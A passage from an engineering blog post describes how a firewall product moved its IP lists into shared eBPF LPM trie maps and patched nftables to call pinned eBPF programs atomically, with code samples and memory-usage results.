add element ip mfw set0 { 192.0.2.0, 192.0.2.2, …, 198.51.100.0, 198.51.100.2, … }

to

add element ip mfw set0 { 192.0.2.0, … }
add element ip mfw set0 { 198.51.100.0, … }

just to squeeze out a second or two of reduced time that nft took to process our configuration. We were spending a fair amount of development cycles looking for optimizations, and we needed to find a way to turn the tides.

One more step with eBPF

As we mentioned on our blog recently, Magic Firewall leverages eBPF for some advanced packet-matching. And it may not be a big surprise that eBPF can match an IP in a list, but it wasn’t a tool we thought to reach for a year ago. What makes eBPF relevant to this problem is that eBPF maps exist regardless of a network namespace. That’s right; eBPF gives us a way to share this data across all the network namespaces we create for our customers.

Since several of our IP lists contain ranges, we can’t use a simple BPF_MAP_TYPE_HASH or BPF_MAP_TYPE_ARRAY to perform a lookup. Fortunately, Linux already has a data structure that we can use to accommodate ranges: the BPF_MAP_TYPE_LPM_TRIE.

Given an IP address, the trie’s implementation of bpf_map_lookup_elem() will return a non-null result if the IP falls within any of the ranges already inserted into the map. And using the map is about as simple as it gets for eBPF programs. Here’s an example:

typedef struct {
	__u32 prefix_len;
	__u8 ip[4];
} trie_key_t;

SEC("maps")
struct bpf_map_def ip_list = {
    .type = BPF_MAP_TYPE_LPM_TRIE,
    .key_size = sizeof(trie_key_t),
    .value_size = 1,
    .max_entries = 1,
    .map_flags = BPF_F_NO_PREALLOC,
};

SEC("socket/saddr_in_list")
int saddr_in_list(struct __sk_buff *skb) {
	struct iphdr iph;
	trie_key_t trie_key;

	bpf_skb_load_bytes(skb, 0, &iph, sizeof(iph));

	trie_key.prefix_len = 32;
	trie_key.ip[0] = iph.saddr & 0xff;
	trie_key.ip[1] = (iph.saddr >> 8) & 0xff;
	trie_key.ip[2] = (iph.saddr >> 16) & 0xff;
	trie_key.ip[3] = (iph.saddr >> 24) & 0xff;

	void *val = bpf_map_lookup_elem(&ip_list, &trie_key);
	return val == NULL ? BPF_OK : BPF_DROP;
}

nftables befriends eBPF

One of the limitations of our prior work incorporating eBPF into the firewall involves how the program is loaded into the nftables ruleset. Because the nft command-line program does not support calling a BPF program from a rule, we formatted the Netlink messages ourselves. While this allowed us to insert a rule that executes an eBPF program, it came at the cost of losing out on atomic rule replacements.

So any native nftables rules could be applied in one transaction, but any eBPF-based rules would have to be inserted afterwards. This introduces some headaches for handling failures—if inserting an eBPF rule fails, should we simply retry, or perhaps roll back the nftables ruleset as well? And what if those follow-up operations fail?

In other words, we went from a relatively simple operation—the new firewall configuration either fully applied or didn’t—to a much more complex one. We didn’t want to keep using more and more eBPF without solving this problem. After hacking on the nftables repo for a few days, we came out with a patch that adds a BPF keyword to the nftables configuration syntax.

I won’t cover all the changes, which we hope to upstream soon, but there were two key parts. The first is implementing struct expr_ops and some methods required, which is how nft’s parser knows what to do with each keyword in its configuration language (like the “bpf” keyword we introduced). The second is just a different approach for what we solved previously. Instead of directly formatting struct xt_bpf_info_v1 into a byte array as iptables does, nftables uses the nftnl library to create the netlink messages.

Once we had our footing working in a foreign codebase, that code turned out fairly simple.

static void netlink_gen_bpf(struct netlink_linearize_ctx *ctx,
                            const struct expr *expr,
                            enum nft_registers dreg)
{
       struct nftnl_expr *nle;

       nle = alloc_nft_expr("match");
       nftnl_expr_set_str(nle, NFTNL_EXPR_MT_NAME, "bpf");
       nftnl_expr_set_u8(nle, NFTNL_EXPR_MT_REV, 1);
       nftnl_expr_set(nle, NFTNL_EXPR_MT_INFO, expr->bpf.info, sizeof(struct xt_bpf_info_v1));
       nft_rule_add_expr(ctx, nle, &expr->location);
}

With the patch finally built, it became possible for us to write configuration like this where we can provide a path to any pinned eBPF program.

# nft -f - <<EOF
table ip mfw {
  chain input {
    bpf pinned "/sys/fs/bpf/filter" drop
  }
}
EOF

And now we can mix native nftables matches with eBPF programs without giving up the atomic nature of nft commands. This unlocks the opportunity for us to build even more advanced packet inspection and protocol detection in eBPF.

Results

This plot shows kernel memory during the time of the deployment – the change was rolled out to each namespace over a few hours.

Optimizing Magic Firewall’s IP lists

Though at this point, we’ve merely moved memory out of this slab. Fortunately, the eBPF map memory now appears in the cgroup for our Golang process, so it’s relatively easy to report. Here’s the point at which we first started populating the maps:

Optimizing Magic Firewall’s IP lists

This change was pushed a couple of weeks before the maps were actually used in the firewall (i.e. the graph just above). And it has remained constant ever since—unlike our original design, the number of customers is no longer a predominant factor in this feature’s resource usage.  The new model makes us more confident about how the service will behave as our product continues to grow.

Other than being better positioned to use eBPF more in the future, we made a significant improvement on the efficiency of the product today. In any project that grows rapidly for a while, an engineer can often see a few pesky pitfalls looming on the horizon. It is very satisfying to dive deep into these technologies and come out with a creative, novel solution before experiencing too much pain. We love solving hard problems and improving our systems to handle rapid growth in addition to pushing lots of new features.

Does that sound like an environment you want to work in? Consider applying!